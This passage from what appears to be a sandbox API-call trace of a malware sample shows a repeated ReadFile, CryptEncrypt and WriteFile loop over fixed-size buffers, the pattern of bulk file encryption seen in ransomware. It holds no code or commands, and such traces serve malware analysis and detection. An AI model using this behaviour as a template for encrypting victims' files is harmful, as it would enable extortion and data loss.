returned 1 [0279.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.068] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.068] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.068] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.069] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.069] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.069] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.069] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.069] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.070] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.070] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.070] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.070] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.070] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.070] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.071] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.071] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.071] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.071] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.071] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.071] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.072] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.072] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.072] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.072] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.072] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.073] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.073] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.073] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.073] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.073] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.073] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.074] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.074] ReadFile (in: 